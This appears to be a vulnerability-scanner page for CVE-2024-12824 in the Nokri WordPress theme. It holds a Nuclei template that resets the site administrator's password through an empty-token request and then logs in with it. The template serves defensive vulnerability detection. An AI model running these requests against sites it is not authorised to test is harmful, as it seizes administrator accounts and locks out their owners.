Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change

ID: CVE-2024-12824

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,intrusive,nokri,unauth

Description

The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user’s password, including administrators, and leverage that to gain access to their account.

YAML Source

id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.00091
    epss-percentile: 0.41121
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100f2d87123908e6899469beffe7b50904f1c2f5cdf7b6fe36a516f35cf4916f62602206d16c3c21e0d79a685c4b2374a5349157569ec4b042c67f6f789c9a7c682dc98:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-12824.yaml"

View on Github